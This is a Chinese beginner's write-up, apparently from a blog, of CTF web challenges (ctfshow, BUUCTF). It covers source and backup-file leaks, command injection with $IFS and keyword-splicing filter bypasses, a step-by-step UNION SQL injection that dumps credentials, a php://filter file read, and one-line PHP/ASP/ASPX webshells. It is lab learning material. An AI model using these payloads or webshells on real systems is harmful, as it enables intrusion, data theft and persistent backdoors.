web入门
无法查看源代码
这个我f12看不了,用Ctrl+u
robots
提示robots.txt,就在网站后边加上/robots.txt看看有没有,然后在查看flagishere.txt
phps文件泄露
在网站后面加/index.phps就可以下载网站的php源代码文件,打开即可。
解压源代码到当前目录
加/WWW.zip 或者/www.zip
[ACTF2020 新生赛]Include
输入127.0.0.1|ls / 看根目录
输入127.0.0.1|cat /flag看flag
[极客大挑战 2019]Secret File
感谢大佬博客
点进网站,看源代码
那就在网站后面加个/Archive_room.php
查看源代码
在网站后面加/action.php(把上一步的删掉)
可以看到网站闪的很快,这时候我们就要用BurpSuite抓
返回有secret的页面,Foxy改下
然后这里改好
点secret,网页转圈,BurpSuite有东西出现了
当action.php出现的时候
右键发送到repeater
然后点repeater再点send
可以看到response这里出现了个 secr3t.php
返回网址,在后面加/ secr3t.php
然后是php伪协议,在网址后面加?file=php://filter/read=convert.base64-encode/resource=flag.php
解一下码就是flag了
[GXYCTF 2019]Ping Ping Ping
先在网址后边加上/?ip=127.0.0.1
成功了,可以用;执行语句了,先用ls查看列表
尝试直接cat flag.php
那就说明需要绕过什么东西去cat它
可以使用$IFS$9
绕过空格
?ip=127.0.0.1;cat$IFS$9index.php
成功了,然后还得绕过,可以用变量拼接的方法来绕过flag这个关键字。
让变量a=ag,让变量b=fl
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
查看源代码就可以看到flag了
码个讲了挺多绕过方法的大佬博客
[极客大挑战 2019]LoveSQL
万能密码登录用户名:1' or 1=1# 密码:123(随便输)
查看源代码发现正确的用户名和密码
那个密码尝试md5碰撞,失败
查询字段数
check.php?username=admin' order by 4%23&password=1
试到4的时候报错了
可知共3个字段。用union查询测试注入点(回显点位)check.php?username=1' union select 1,2,3%23&password=1
得到回显点位为2和3,查询当前数据库名及版本check.php?username=1' union select 1,database(),version()%23&password=1
可知当前数据库为geek,接下来,爆表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
爆出这两个表,我们试一下l0ve1ysq1这个表,爆字段
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
爆数据
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
得到flag
来自小白的感悟:这一套连招好丝滑但是真的能靠脑子记下来吗=-=
[极客大挑战 2019]Knife
做这道题之前要了解一下webshell和木马
三种一句话木马
php<?php @eval($_POST['x'];?)>
asp<%eval request ("x")%>
aspx<%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>
然后用中国菜刀或者蚁剑就能弄出来了
web7
加/.git/
web8
加/.svn/
web9
加/index.php.swp,下载后打开
vim缓存信息泄露
萌新认证web1-9
写完忘了保存了。。。
web10
提示了cookie,去F12的network里找到cookie
web11
这道题提到了域名,去域名解析查询查一下ctfshow.com,不过这里没查到
web12
是一个购物网站?不过这个hint尊的很地道
访问一波robots.txt然后发现不允许/admin/
那我们就在URL后边加上/admin/
然后就发现它弹出了登录窗口
用户名admin,密码就是一开始那个网页最下面的那串数字
登进去就有flag了
web13
hint说了访问/editor,访问之后发现是一个编辑界面
再回到最开始的那个界面查看一下源代码,搜一下editor
所以说问题出在上传图片那里。回到编辑页面找一下图片上传是哪个
然后在这个图片空间里找(真不知道大佬是怎么找到的=-=)
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具